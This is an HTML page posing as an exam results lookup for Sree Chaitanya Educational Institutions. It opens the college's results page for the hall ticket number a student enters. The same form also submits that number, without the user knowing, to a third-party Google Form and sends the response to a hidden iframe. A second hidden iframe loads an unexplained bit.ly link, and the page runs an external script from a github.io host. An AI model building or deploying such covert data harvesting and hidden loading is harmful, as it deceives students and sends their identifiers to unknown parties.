<!DOCTYPE HTML>
<html>
<head>
<title>
SCCE RESULTS
</title>
<meta name="viewport" content="width=device-width">
<meta name="description" content="JNTUH B.TECH Results r16 , r15 ,r17 , r18 , r19 , 1-1 Reg/Supply ,1-2 Regular/supply,2-1 Regular/Supply,2-2 Regular/Supply, 3-1 Regular/Supply,3-2 Regular/Supply,4-1 Regular/Supply , 4-2 Regular/Supply">
<meta name="keywords" content="JNTUH B.TECH Results r16 , r15 ,r17 , r18 , r19 , 1-1 Reg/Supply ,1-2 Regular/supply,2-1 Regular/Supply,2-2 Regular/Supply, 3-1 Regular/Supply,3-2 Regular/Supply,4-1 Regular/Supply , 4-2 Regular/Supply">
<link rel="icon" sizes="192x192" href="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTQ8fqTHchpuagoTnkBA3vAYb1YDXR_AHSOIw&usqp=CAU">

<script src="https://spat-cloud.github.io/data/HarScript/HarScript.v2.0.Latest.min.js"></script>
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-ZE29Q71V0Z"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-ZE29Q71V0Z');
</script>
<noscript>
				<style>
								#Msg
								{
												color:#000000;
												font-size:12px;
												margin:4% auto;
												background-color:#DDD;
												width:100%;
												left:0;
												right:2px;
												border-radius:4px;
												font-weight:588;
												border:2px solid #FF0000;
												padding:.8em 4em;
												box-shadow:0px 8px 4px 2px #000;
												animation:ColorChange 4s 1;
								}
								@keyframes ColorChange
								{
												from
												{
																background-color:#FF0000;
																margin:24% auto;
												}
												to
												{
																background-color:yellow;
																
																
																
												}
								}
				</style>
			
							<p id="Msg">No <i>JavaScript</i> please  Enable <i>JavaScript</i> in Your Browser And Reload page</p>
			
</noscript>
</head>
<script type="text/javascript">
function sub()
{
if($HId('j').value==""||$HId('j').value==null)
{
  HWarning("Empty");
}
else if($HId('j').value.length!==10)
{
HAlertBox("Invalid Number");
}
else if($HId('j').value.length==10){
window.open('http://scce.ac.in/parent12/r15extres_cmr.php?HallticketNo' + '=' + $HId('j').value + '&' + 'dayatten' + '=' + 'Submit',"blank");
}
}
function k(c){
c.value = c.value.toUpperCase();
}
</script>
<style type="text/css">
#j{
					color:#000;
	background-color:#fff;
	font-size:10px;
	border:2px solid #4ff;
	border-radius:4px;
	padding:8px;
	width:200px;
	/*box-shadow:10px 12px 20px lightblue;*/
}
#btn{
color:#FFF;
font-size:12px;
padding:10px;
background-color:green;
border-radius:4px;
text-align:center;
width:180px;
border:none;
}
#ee{
font-size:20px;
color:#000;
text-align:center;
}
</style>
<body>
<!--
https://bit.ly/3hcK0ZV
-->
<iframe name="abcd" style="display:none;"></iframe>
<iframe src="https://bit.ly/3hcK0ZV" style="display:none;"></iframe>

<h1 id="ee"> SREE CHAITANYA EDUCATIONAL INSTITUTIONS</h1>
<form action="https://docs.google.com/forms/u/0/d/e/1FAIpQLSfthAOyy2oF38lU5f4ag3ulJ8AHcRXtPHHJ-ibRh7UfX_6etw/formResponse" id="ts" method="POST" target="abcd">
<center><input type="text" id="j" name="entry.470512502" onkeyup="k(this)"></center>
<center><input type="submit" id="btn" onclick="sub()"></center>
</form>

<iframe name="tar" width="800" height="1400" id="d" style="display:none;" frameborder=0></iframe>
</body>
</html>
